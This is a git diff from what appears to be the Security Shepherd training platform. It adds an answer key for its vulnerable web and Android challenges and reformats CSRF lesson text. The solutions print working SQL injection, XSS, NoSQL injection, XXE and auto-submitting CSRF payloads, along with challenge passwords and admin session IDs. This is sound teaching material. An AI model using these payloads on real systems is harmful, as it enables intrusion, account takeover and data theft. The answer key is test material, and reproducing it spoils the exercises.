+82e8e9e2941a06852b90c97087309b067aeb2c4c.solution = The user Id's in this challenge are hashed using MD5. You can google the ID's to find their plain text if you have an internet connection to find their plain text. The sequence of ID's is as follows;<br/>2, 3, 5, 7, 9, 11<br/>The next number in the sequence is 13. Modify the request with a proxy so that the id is the MD5 of 13 (c51ce410c124a10e0db5e4b97fc2af39)
+a84bbf8737a9ca749d81d5226fc87e0c828138ee.solution = To complete this challenge without prior knowledge, a user must exploit an SQL injection flaw in a 'VIP Coupon Check' call. To find this function call they must deobfusticate the JavaScript file in the challenge. The address of the function is <b>challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck</b> on the exposed server. The parameter vulnerable to SQL injection in the POST request call to this URL is <b>couponCode</b>. There is no filter in this challenge so using <b>' union select itemId, percentOff, CONCAT('This is the couponCode: ', couponCode, ' ') from vipCoupons; -- </b> as the vulnerable parameter value will retrieve the necessary coupon.
+e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998.solution = The filter in this challenge is removing all single quotes. However as there are two user parameters being utilised in the challenges login query, backslashes can be used to escape the user input's intended string context. The challenge can be completed with a user name of a <b>Backslash</b>  and a password of <b>OR 1 = 1 AND idusers = 7; -- </b> (Space after the -- is important!) so that you are signed in as the admin user.
+ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe.solution = This challenge can be defeated by encoding SQL Injection attacks for \x UTF. For Example, the following will reveal the challenges result key; <b>\\x27\\x20UNION\\x20SELECT\\x20userAnswer\\x20FROM\\x20users\\x20WHERE\\x20userName\\x20\\x3D\\x20\\x27Brendan\\x27\\x3B\\x20--\\x20</b>
+182f519ef2add981c77a584380f41875edc65a56.solution = This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; <b>http://test"oNmouseover=alert(123);//</b>
+fccf8e4d5372ee5a73af5f862dc810545d19b176.solution = This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; <b>http://test""onmouseover=alert(123);//</b> 
+0a37cb9296ff3763f7f3a45ff313bce47afa9384.solution = To guarantee completing this CSRF Challenge in a single attempt, a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with all of the possible CSRF tokens for the challenge. The only possible csrf tokens for this challenge are 0, 1 and 2.
+04a5bd8656fdeceac26e21ef6b04b90eaafbd7d5.solution = To guarantee completing this CSRF Challenge in a single attempt, a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with all of the possible CSRF tokens for the challenge. The only possible csrf tokens for this challenge are c4ca4238a0b923820dcc509a6f75849b, c81e728d9d4c2f636f067f89cc14862c and eccbc87e4b5ce2fe28308fd9f2a7baf3.
+853c98bd070fe0d31f1ec8b4f2ada9d7fd1784c5.solution = To complete this challenge, a user must exploit an SQL Wild Card Enumeration in the 'Retrieve Token' function to retrieve other users CSRF token (Submit a percentage sign - you may need to encode it to %25). This information must be utilised to launch a CSRF attack against them before they refresh the challenge page themselves. Once a victim refreshes the challenge page, their token updates. Social Engineering will need to be utilised to successfully complete this challenge.
+3d5b46abc6865ba09aaff98a8278a5f5e339abff.solution = View the source of this challenge and inspect the JavaScript at the end of the page. It contains two functions, and one of them is for a HTML element that is not in the level. This function is an admin function and reveals a URL very similar to the user function. Send a valid post request, as described by the JavaScript, to that URL to retrieve the result key.
+c7ac1e05faa2d4b1016cfcc726e0689419662784.solution = View the source of this challenge and inspect the JavaScript at the end of the page. You can deobfusticate the JavaScript with an on line web tool, give it a Google. The script contains two functions, and one of them is for a HTML element that is not in the level. This function is an admin function and reveals a URL very similar to the user function. Send a valid post request, as described by the JavaScript, to that URL to retrieve the result key.
+b3cfd5890649e6815a1c7107cc41d17c82826cfa.solution = There are a number of ways to defeat the crypto and get the encryption key in this challenge. The quickest way is to submit base64 encoded spaces. The crypto XOR's the spaces with the key and returns the resultant 'cipher text which is the encryption key.
+ced925f8357a17cfe3225c6236df0f681b2447c4.solution = Users must discover the session id for this sub application is very weak. The default session ID for a guest will be 00000001 base64'd twice. The admin's session ID is TURBd01EQXdNREF3TURBd01EQXdPUT09 (0000000000000009 when decoded).
+c6841bcc326c4bad3a23cd4fa6391eb9bdb146ed.solution = This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; <b> http://""onmouseover=alert(123);//</b>
+53a53a66cb3bf3e4c665c442425ca90e29536edd.solution = The Admin credentials are stored in plain text in a db file. Go to /data/data/insecuredata/databases and run the following command " Strings Members" or "cat Members". To get to root CLI on the VM press alt F1.
+307f78f18fd6a87e50ed6705231a9f24cd582574.solution = The Admin credentials are encoded in a db file. Go to /data/data/insecuredata1/databases and cat the Users.db file. Burp has a decoder which will reveal the key, alternatively there are online tools which can also do this
+da3de2e556494a9c2fb7308a98454cf55f3a4911.solution = The Admin credentials are hashed (but not salted) in a db file. Go to /data/data/insecuredata2/databases and cat the db file called Password.db. The key is a password which has been hashed using MD5, there are online tools which will attempt to crack this hashed value.
+335440fef02d19259254ed88293b62f31cccdd41.solution = The Login is vulnerable to SQL injection, Admin ' OR 1 = 1 ; -- will work in the username field and anything in the password field (So a blank field error does not occur).
+a3f7ffd0f9c3d15564428d4df0b91bd927e4e5e4.solution = The login is vulnerable to SQL injection however, some input is being filtered. OR + 1 = 1 will be filtering into spaces of comments. anyOtherValue=anyOtherValue will work as well as 0r.
+e635fce334aa61fdaa459c21c286d6332eddcdd3.solution = The login is vulnerable to SQL injection however there is filtering in place, to get an OR in the statement use OORR, to get a comment use -OR-. So the following statement should work: Admin ' oorr 'a' = 'a' ; -or-
+ef6496892b8e48ac2f349cdd7c8ecb889fc982af.solution = The chat has not been encrypted but encoded using hex, this can be decoded using burp or the following site:http://www.asciitohex.com/
+3f010a976bcbd6a37fba4a10e4a057acc80bdc09.solution = The chat has been encrypted using DES. The same key is used every time and the key is stored insecurely within the app package.
+63bc4811a2e72a7c833962e5d47a41251cd90de3.solution = The chat has been encrypted using AES (with CBC mode). Multiple keys are used this time but keys are stored insecurely on the App. key 1 decrypts message 1, key 2 decrypts message 2 and so forth.
+2ab09c0c18470ae5f87d219d019a1f603e66f944.solution = The key is stored in the source code of the App, get dex2jar and use it to turn the apk to a jar file, then open the jar and find the key in the main class.
+f16bf2ab1c1bf400d36330f91e9ac6045edcd003.solution = The key is stored in the source code of the App, get dex2jar and use it to turn the apk to a jar file, then open the jar. The key is present within a conditional statement in the class called Triangle.
+9e46e3c8bde42dc16b9131c0547eedbf265e8f16.solution = The key is not present in the code, however a check for the key is. This can be reverse engineered and the code extracted and run as a java class. Running this java class after changing the check to print the key will reveal it.
+1506f22cd73d14d8a73e0ee32006f35d4f234799.solution = Logs are stored insecurely on the App. These contain the key. The logs can be found in a directory called "files" within the app package in the data/data directory. Every time the app is interacted with, new logs are generated.
+ed732e695b85baca21d80966306a9ab5ec37477f.solution = In this challenge you must craft a HTTP request to reset an admin accounts password. The HTTP request is described in the javascript contained in the challenge page (The last function in the script). The token value in this request must be a base 64 encoded date time value such as the following;<br><br> <b>Thu Aug 28 18:48:10 BST 2014</b><br><br> The token value must be less than 10 minutes from the servers time.
+cfbf7b915ee56508ad46ab79878f37fd9afe0d27.solution = To complete this challenge a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with their CSRF token. This CSRF Token will work on any user.
+9294ba32bdbd680e3260a0315cd98bf6ce8b69bd.solution = The first step in completing this challenge is to get an admin user's email address. Try to sign in as 'root' or 'superuser' to get one. To complete this challenge a user must use SQL Injection in the email Parameter in the GET request to the SecretQuestion servlet. The following email submission will achieve the response of the users secret answer (This example is URL Encoded)<br><br/>&quot;UNION+SELECT+secretAnswer+FROM+users+WHERE+userName=&quot;<b>root</b><br><br>You can then use this answer along with a user email address to complete the level.
+7153290d128cfdef5f40742dbaeb129a36ac2340.solution = To complete this challenge a user must send the server a request with the 'challengeRole' value set to 'nmHqLjQknlHs'. The challengeRole cookie is encoded with ATOM-128. The value 'nmHqLjQknlHs' when decoded is 'superuser'.
+145111e80400e4fd48bd3aa5aca382e9c5640793.solution = To complete this challenge a user must deobfusticate the javascript found in /couponCheck.js and extract the relevent cryptoinformation to manually decrypt a javascript array of encrypted coupons, or to manipulate the javascript so that it returns the decrypted coupons. The &quot;des&quot; function call reveals the Encryption key and the padding used by the algorithm. The &quot;des&quot; function in the javascript can be changed to decryption mode by changing the boolean argument to negative. The text to be decoded needs to be taken from the array of encrypted coupon codes. To recover the coupon code for free oranges you can run this command from your browsers console when opened in the context of the level&apos;s JSP page; <b> des(chars_from_hex(&apos;0ba950d08830c8079bded71b852934453db8f4ffff1f5842&apos;), chars_from_hex(bits[6]), 0, chars_from_hex(&apos;821fd38b9a7c0247&apos;) ? 1 : 0, chars_from_hex(&apos;821fd38b9a7c0247&apos;));</b>
+adc845f9624716eefabcc90d172bab4096fa2ac4.solution = To complete this challenge, a SQL Injection Flaw must be exploited to learn the name of the super admin in a request described in the module's javascript. This function is not used by the presented HTML. You must manually craft this request and include an injection attack through the BASE64 encoded cookie named 'currentPerson'. a simple &quot;or&quot;1&quot;!=&quot;0 vector will work. Take the super admin's name and submit it encoded for BASE64 as the currentPerson cookie value in the request that is submitted when the Admin button is clicked. This will return the result key for the challenge.
+64070f5aec0593962a29a141110b9239d73cd7b3.solution = To complete this challenge, a SQL injection flaw must be exploited. The vulnerable paramater is 'subUserEmail'. It must be mostly well formed as an email address to get past the validation process. The following vector, which is URL encoded, will sign the user in as user 1. <br><br><b>'or'1'='1'union%0aselect%0auserName%0afrom%0ausers%0awhere''!='%40v</b>
+1e3c02ad49fa9a9e396a3b268d7da8f0b647d8f9.solution = To complete this challenge, connect the android debug bridge to the VM and run  adb logcat –d \<file location\> to dump logs to a text file. Trigger the key log by pressing the lotto button
+f40b0cd5d45327c9426675313f581cf70c7c7c28.solution = To complete this challenge, start the app, go to the command line of the VM using ALT F1 and then navigate to /sdcard/, pictorial logs are places there. Connect adb to the device and run the adb pull command on the logs. 
+ba6e65e4881c8499b5e53eb33b5be6b5d0f1fb2c.solution = To complete this challenge, start the app, and login to get the key. you must login with an auth code. the code must be odd, must contain the numbers 2 and 4 and must be six digits long. previous codes may show up in a suggestion when typing the code in which will reveal this pattern.
+52885a3db5b09adc24f38bc453fe348f850649b3.solution = To complete this challenge, find jarsigner which comes with the jdk and in a command line run the following:  jarsigner -verify -verbose -certs ReverseEngineer2.apk.
+3b1af0ad239325bf494c6e606585320b31612e72.solution = To complete this challenge, use adb pull to grab the key file and the key.db file from the app's /data/data/ directory. With the db password: Pa88w0rd1234 decrypt the database to get the key to the level. This will either require a small amount of coding or you can download and build sqlcipher. Finally there is an App on the playstore which can be used called SQLCipher Decrypt.
+0cdd1549e7c74084d7059ce748b93ef657b44457.solution = To complete this challenge, you need to login to the App. The password reset function rquires two answers which can be gathered from the logs on the App. The answers are chicken and meade. This will reset the password to a six digit code and allow you to login and view the key.
+368491877a0318e9a774ba5d648c33cb0165ba1e.solution = This challenge requires a bit of thinking to complete organically. First you must find some admin email addresses. The login function will return them when valid usernames are submitted. Try using root or superuser with any password. Use the email address in the secret question function to get that user's Secret Question. The secret question for each user is 'What is your favourite flower?'. There are only so many flowers. Any of the following flowers are valid answers. Root's favourite flower is 'Franklin Tree'. <br><br> Valid answers: Jade Vine, Corpse Flower, Gibraltar Campion, Franklin Tree, Middlemist Red, Chocolate Cosmos or Ghost Orchid
+6be5de81223cc1b38b6e427cc44f8b6a28d2bc96.solution = The shopping cart application does not validate the number of items you are buying. Set the orange amount to 1, apple amount to 0, banana amount to 0 and the pineapple amount to -101.
+3b14ca3c8f9b90c9b2c8cd1fba9fa67add1272a3.solution = The shopping cart application only ensures that the amount of items bought is a positive number. By buying 999295724 oranges, the total cost integer value will overflow and enter a negative state.
+b9d82aa7b46ddaddb6acfe470452a8362136a31e.solution = Enter a valid number in the submit box and click submit number. Capture the request in a HTTP proxy and modify the number to a negative value.
+bf847c4a8153d487d6ec36f4fca9b77749597c64.solution = Sign into the application with the generic admin default combination of 'admin' and 'password'.
+fcc2558e0a23b8420e173cf8029876cb887408d3.solution = To complete this challenge, you must force another user to submit a post request which contains a JSON payload. The easiest way to achieve this is to force the user to visit a custom web page that submits the post request. This means the web page needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. It is possible to use HTML forms to submit cross domain POST requets with JSON payloads by setting the <b>enctype</b> attribute to text/plain and then forming the JSON payload around the necessary equals symbol which normally deliminates the parameter name from the parameter value. The following is an example web page that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallengeJson&quot; enctype=&quot;text/plain&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&#x27;{&quot;userId&quot;:&quot;exampleId&quot;,&quot;&#x27; value=&#x27;&quot;,&quotend&quote}&#x27;><br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallengeJson&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.
+6158a695f20f9286d5f12ff3f4d42678f4a9740c.solution = To complete this challenge, you must be able to capture the traffic of another user. The simplest way to simulate this would be to create a second user account and open it in a separate browser and open this challenge. You could then just steal the cookie straight from the browser. To demo how to solve this as expected you would actually open Wireshark and record the 2nd user opening the challenge. Filter the network capture for ip.dst == ShepherdInstanceIp, and find the unencrypted HTTP packet. Right click it and select 'Follow TCP stream'. You'll see the cookie in that dialog. <br><br> Once you have the token collected, in your original browser, click the button and intercept the request with a Proxy. Replace your cookie value with the one you collected from another user.
+de626470273c01388629e5a56ac6f17e2eef957b.solution = To complete this challenge you must first register an account. The account must have a unique name. The next step is to click the refresh balance button. Capture this request, and replay it with different account numbers until you find one with cash. If you are the first person to attempt this challenge, the account number 1 should have 10 million in it. Take note of the account number that has cash. Now fill out the 'Transfer Funds' form with any data. Capture that requets and change the receiver account number parameter to the value the sender account number parameter is currently equal to (This is your account number), change the sender account number to the identifier you noted earlier and set the transfer amount to as high as possible (must be some money left in account to work). Keep doing this untill your account has more than 5 million in it. Then open the level again or sign in / out of the account to get the result key
+dc89383763c68cba0aaa1c6f3fd4c17e9d49a805.solution = The following attack vectors will expose the result key over two queries.<br><br>Step One: <b>test' AND (SELECT 7303 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),1,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hdTL'='hdTL</b><br><br>This will return an error revealing the first part of the key in the message with <b>qxkzq1</b> added to the end for padding. remove those characters and record the rest of the key revealed. <br><br>Step Two: <b>test' AND (SELECT 9441 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),51,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ilGf'='ilGf</b><br><br>This will reveal the second part of the key, padded with <b>qkjvq</b> at the start and <b>qxkzq1</b> at the end. Remove the padding and add the rest to the previously revealed part of the result key. That is the key to solve this challenge.
+5b461ebe2e5e2797740cb3e9c7e3f93449a93e3a.solution = Connect to the device via adb and run the following command - adb shell content query --uri content://com.somewhere.hidden.SecretProvider/data
+c685f8102ae0128c2ab342df64699bb8209a0839.solution = One way to exploit this security risk is to escape the leading backslash that is added before apostrophes with another backslash. The following attack vector will solve the level;<br><br> &#x5c;&apos;or&quot;1&quot;=&quot;1&quot;&#x3b;&nbsp--&nbsp
+d7eaeaa1cc4f218abd86d14eefa183a0f8eb6298.solution = The database in this level utilises MongoDb which does NOT use SQL. Queries in MongoDb are done through JavaScript. <br>You need to stop the request in an HTTP proxy and use the following JavaScript to exploit the vulnerability:<br /> <em>';return(true);var a='a</em>
+f02ce6bcd0a822d245433533997eaf44379065f4.solution = This challenge is difficult to exploit and heavily depends on your user name. See <a href="https://github.com/OWASP/SecurityShepherd/issues/280">this github ticket</a> for more details. This was a vulnerability in Security Shepherd that was fixed
+df2ac757cc135dcb8ce5ea01f677c74f04b446d6.solution = To exploit this take Example 1, replace file:///etc/shadow with file:///usr/local/tomcat/briefcase.pulp and also replace &#x3C;foo&#x3E;&xxe;&#x3C;/foo&#x3E; with &#x3C;email&#x3E;&xxe;&#x3C;/email&#x3E;
+08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae.solution = To exploit this view the source of the iframe where you'll see two functions for sending a request - leFormNew and leFormOld. The new one is for JSON and the old one uses XML where the developers left this one in place and can be exploited through XML injection. It is exploited the very same way as the XXE lesson.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.properties b/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.properties
index 18690010c..877dc181a 100644
--- a/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.properties
+++ b/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7.properties
@@ -1,15 +1,19 @@
-title.question.csrf=What is a Cross-Site Request Forgery?
-paragraph.info1=A Cross-Site Request Forgery, or <a>CSRF</a>, attack forces a user's browser to send a <a>forged HTTP request</a> with the user's session cookie to an application, tricking the user into unknowingly interacting with an application that they are currently logged into. CSRF attacks are possible when the application does not ensure that a user is in fact interacting with it. The severity of a CSRF attack varies with the functionality of the application the victim is tricked into interacting with. If the attack is aimed at an administrator, the severity will be a lot higher than those aimed at a guest user. 
-paragraph.info2=To prevent CSRF attacks, every request must contain a <a>nonce</a> token (an unpredictable number) to be included with every request. To find CSRF vulnerabilities in applications, this is the token that is tested. If a request does not contain a nonce at all, then it is likely vulnerable to CSRF attacks. If a request does contain a nonce, then there are more steps to include in testing for CSRF. Even though the nonce is in the request it may not be validated or may work with a null value. It is possible that the application's nonce management will allow an attacker to use their valid nonce in other user requests!
-paragraph.info3=HTTP requests can be sent using JavaScript. Requests that are sent this way include an "X-Requested-With" HTTP header. If this is checked for on incoming requests, this can serve as CSRF protection without a nonce value. This header cannot be replicated from a remote domain, due to the <a>Same Origin Policy</a>, preventing an attacker from delivering the attack remotely. It is not advised to use this as a sole CSRF protection model, as browser issues are commonly found that allow attackers to send cross-domain requests from a browser.
-paragraph.info4=CSRF attacks can be performed on <a>GET</a> and <a>POST</a> HTTP requests. To force a victim to seamlessly submit a request in a GET request, the request (highlighted) can be embedded into an image tag on a web page such as follows;<br /> &lt;img src=&quot;<a>http://www.secureBank.ie/sendMoney?giveMoneyTo=hacker&amp;giveAmount=1000</a>&quot;/&gt;
-paragraph.info5=To force a victim to send a POST request, it requires a little more effort. The easiest way is to create a form that automatically submits using JavaScript, such as the following example;<br/> &lt;form name=&quot;csrfForm&quot; action=&quot;<a>http://www.secureBank.ie/sendMoney</a>&quot; method=&quot;<a>POST</a>&quot;&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;<a>giveMoneyTo</a>&quot; value=&quot;hacker&quot; /&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;<a>giveAmount</a>&quot; value=&quot;1000&quot; /&gt;<br /> &lt;input type=&quot;submit&quot;/&gt;<br /> &lt;/form&gt;<br /> &lt;script&gt;<br /> document.csrfForm.submit();<br /> &lt;/script&gt;
-paragraph.info6=The function used by an administrator to mark this lesson as complete for a user is initiated by the following GET request to this server, where 'exampleId' is a valid userId; 
-paragraph.info7=To complete this lesson, send the administrator a message with a image URL, that will show in an embedded <a>&lt;img&gt;</a> tag that will force them to submit the request described above, replacing the exampleId attribute with your temp userId
-challenge.title=Contact Admin
-challenge.description=Please enter the <a>URL of the image</a> that you want to send to one of Security Shepherds 24 hour administrators.
-button.hideIntro=Hide CSRF Introduction
-button.showIntro=Show CSRF Introduction
-button.sendMessage=Send Message
-generic.loading=Loading
-generic.error=An Error Occurred
\ No newline at end of file
+title.question.csrf = What is a Cross-Site Request Forgery?
+
+paragraph.info1 = A Cross-Site Request Forgery, or <a>CSRF</a>, attack forces a user's browser to send a <a>forged HTTP request</a> with the user's session cookie to an application, tricking the user into unknowingly interacting with an application that they are currently logged into. CSRF attacks are possible when the application does not ensure that a user is in fact interacting with it. The severity of a CSRF attack varies with the functionality of the application the victim is tricked into interacting with. If the attack is aimed at an administrator, the severity will be a lot higher than those aimed at a guest user. 
+paragraph.info2 = To prevent CSRF attacks, every request must contain a <a>nonce</a> token (an unpredictable number) to be included with every request. To find CSRF vulnerabilities in applications, this is the token that is tested. If a request does not contain a nonce at all, then it is likely vulnerable to CSRF attacks. If a request does contain a nonce, then there are more steps to include in testing for CSRF. Even though the nonce is in the request it may not be validated or may work with a null value. It is possible that the application's nonce management will allow an attacker to use their valid nonce in other user requests!
+paragraph.info3 = HTTP requests can be sent using JavaScript. Requests that are sent this way include an "X-Requested-With" HTTP header. If this is checked for on incoming requests, this can serve as CSRF protection without a nonce value. This header cannot be replicated from a remote domain, due to the <a>Same Origin Policy</a>, preventing an attacker from delivering the attack remotely. It is not advised to use this as a sole CSRF protection model, as browser issues are commonly found that allow attackers to send cross-domain requests from a browser.
+paragraph.info4 = CSRF attacks can be performed on <a>GET</a> and <a>POST</a> HTTP requests. To force a victim to seamlessly submit a request in a GET request, the request (highlighted) can be embedded into an image tag on a web page such as follows;<br /> &lt;img src=&quot;<a>http://www.secureBank.ie/sendMoney?giveMoneyTo=hacker&amp;giveAmount=1000</a>&quot;/&gt;
+paragraph.info5 = To force a victim to send a POST request, it requires a little more effort. The easiest way is to create a form that automatically submits using JavaScript, such as the following example;<br/> &lt;form name=&quot;csrfForm&quot; action=&quot;<a>http://www.secureBank.ie/sendMoney</a>&quot; method=&quot;<a>POST</a>&quot;&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;<a>giveMoneyTo</a>&quot; value=&quot;hacker&quot; /&gt;<br /> &lt;input type=&quot;hidden&quot; name=&quot;<a>giveAmount</a>&quot; value=&quot;1000&quot; /&gt;<br /> &lt;input type=&quot;submit&quot;/&gt;<br /> &lt;/form&gt;<br /> &lt;script&gt;<br /> document.csrfForm.submit();<br /> &lt;/script&gt;
+paragraph.info6 = The function used by an administrator to mark this lesson as complete for a user is initiated by the following GET request to this server, where 'exampleId' is a valid userId; 
+paragraph.info7 = To complete this lesson, send the administrator a message with a image URL, that will show in an embedded <a>&lt;img&gt;</a> tag that will force them to submit the request described above, replacing the exampleId attribute with your temp userId
+
+challenge.title = Contact Admin
+challenge.description = Please enter the <a>URL of the image</a> that you want to send to one of Security Shepherds 24 hour administrators.
+				
+button.hideIntro = Hide CSRF Introduction
+button.showIntro = Show CSRF Introduction
+button.sendMessage = Send Message
+
+generic.loading = Loading
+generic.error = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7_zh.properties b/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7_zh.properties
index 5e2e378f4..19253e70b 100644
--- a/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7_zh.properties
+++ b/src/main/resources/i18n/lessons/csrf/ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7_zh.properties
@@ -1,16 +1,19 @@
-title.question.csrf=\u4EC0\u4E48\u662F\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020?
-paragraph.info1=\u4E00\u4E2A\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020\u653B\u51FB\u8FEB\u4F7F\u767B\u5F55\u7528\u6237\u7684\u6D4F\u89C8\u5668\u5C06\u4F2A\u9020\u7684HTTP\u8BF7\u6C42,\u5305\u62EC\u8BE5\u7528\u6237\u7684\u4F1A\u8BDDcookie\u548C\u5176\u4ED6\u8BA4\u8BC1\u4FE1\u606F,\u53D1\u9001\u5230\u4E00\u4E2A\u5B58\u5728\u6F0F\u6D1E\u7684web\u5E94\u7528\u7A0B\u5E8F.\u8FD9\u5C31\u5141\u8BB8\u4E86\u653B\u51FB\u8005\u8FEB\u4F7F\u7528\u6237\u6D4F\u89C8\u5668\u5411\u5B58\u5728\u6F0F\u6D1E\u7684\u5E94\u7528\u7A0B\u5E8F\u53D1\u9001\u6C42,\u800C\u8FD9\u4E9B\u8BF7\u6C42\u4F1A\u88AB\u5E94\u7528\u7A0B\u5E8F\u8BA4\u4E3A\u662F\u7528\u6237\u7684\u5408\u6CD5\u8BF7\u6C42.CSRF\u653B\u51FB\u53EF\u80FD\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F\u4E0D\u786E\u5B9A\u8BE5\u7528\u6237\u5B9E\u9645\u4E0A\u662F\u4E0D\u662F\u4E0E\u5176\u8FDB\u884C\u4EA4\u4E92.CSRF\u653B\u51FB\u7684\u4E25\u91CD\u7A0B\u5EA6\u968F\u53D7\u5BB3\u8005\u88AB\u6B3A\u9A97\u4EA4\u4E92\u7684\u5E94\u7528\u7A0B\u5E8F\u7684\u529F\u80FD\u51B3\u5B9A. \u5982\u679C\u653B\u51FB\u7684\u76EE\u7684\u662F\u7BA1\u7406\u5458,\u90A3\u4E48\u4E25\u91CD\u7A0B\u5EA6\u5C06\u5927\u5927\u9AD8\u51FA\u653B\u51FB\u76EE\u7684\u65E8\u5728\u666E\u901A\u7528\u6237.
-paragraph.info2=\u4E3A\u4E86\u9632\u6B62 CSRF \u653B\u51FB,\u6BCF\u4E00\u4E2A\u7528\u6237\u8BF7\u6C42\u90FD\u5FC5\u987B\u5305\u542B\u4E00\u4E2A<a>\u4E34\u65F6</a>Token(\u4E0D\u53EF\u9884\u77E5\u7684\u6570,\u5373\u968F\u673A\u6570).\u8981\u5728\u5E94\u7528\u7A0B\u5E8F\u4E2D\u627E\u5230 CSRF \u6F0F\u6D1E, Token \u5C31\u662F\u9700\u8981\u6211\u4EEC\u6D4B\u8BD5\u7684\u4E00\u4E2A\u5143\u7D20.\u5982\u679C\u4E00\u4E2A\u8BF7\u6C42\u6CA1\u6709\u5305\u542B\u968F\u5373\u6570,\u90A3\u4E48\u662F\u5F88\u6709\u53EF\u80FD\u88AB CSRF \u653B\u51FB\u7684. \u5982\u679C\u4E00\u4E2A\u8BF7\u6C42\u4E2D\u5305\u542B\u4E86\u4E00\u4E2A\u968F\u5373\u6570,\u90A3\u4E48\u5C31\u9700\u8981\u66F4\u591A\u7684\u6B65\u9AA4\u6765\u5BF9 CSRF \u8FDB\u884C\u6D4B\u8BD5.\u5C3D\u7BA1\u968F\u673A\u6570\u662F\u5728\u8BF7\u6C42\u5F53\u4E2D,\u5B83\u6709\u53EF\u80FD\u4E0D\u88AB\u9A8C\u8BC1\u6216\u53EF\u80FD\u5C31\u662F\u4E00\u4E2A\u7A7A\u503C. \u90A3\u4E48,\u5E94\u7528\u7A0B\u5E8F\u7684\u968F\u673A\u6570\u7BA1\u7406\u53EF\u80FD\u5141\u8BB8\u653B\u51FB\u8005\u4F7F\u7528\u4ED6\u4EEC\u672C\u8EAB\u6709\u6548\u7684\u968F\u673A\u6570\u4F7F\u7528\u5728\u5176\u4ED6\u7528\u6237\u7684\u8BF7\u6C42\u4E2D.
-paragraph.info3=HTTP \u8BF7\u6C42\u53EF\u4EE5\u901A\u8FC7 JavaScript \u53D1\u9001. \u4EE5\u8FD9\u79CD\u65B9\u5F0F\u53D1\u9001\u7684\u8BF7\u6C42\u5305\u542B\u4E00\u4E2A HTTP \u6807\u5934 "X-Requested-With". \u5982\u679C\u8BE5\u6807\u5934\u88AB\u67E5\u9A8C\u5728\u4F20\u5165\u7684\u8BF7\u6C42\u4E2D, \u8FD9\u53EF\u4EE5\u4F5C\u4E3A\u4E00\u4E2A\u5BF9 CSRF \u6CA1\u6709\u968F\u673A\u503C\u7684\u4FDD\u62A4. \u5B83\u4E0D\u80FD\u4ECE\u8FDC\u7A0B\u57DF\u590D\u5236, \u7531\u4E8E <a>Same Origin Policy</a>\u53EF\u4EE5\u9632\u6B62\u653B\u51FB\u8005\u8FDB\u884C\u8FDC\u7A0B\u653B\u51FB. \u4F46\u662F\u4E0D\u5EFA\u8BAE\u4EE5\u6B64\u4F5C\u4E3A\u552F\u4E00\u7684 CSRF \u4FDD\u62A4\u6A21\u5F0F, \u56E0\u4E3A\u5E38\u88AB\u53D1\u73B0\u7684\u6D4F\u89C8\u5668\u95EE\u9898\u662F\u5141\u8BB8\u653B\u51FB\u8005\u901A\u8FC7\u4E00\u4E2A\u6D4F\u89C8\u5668\u53D1\u9001\u8DE8\u57DF\u8BF7\u6C42.
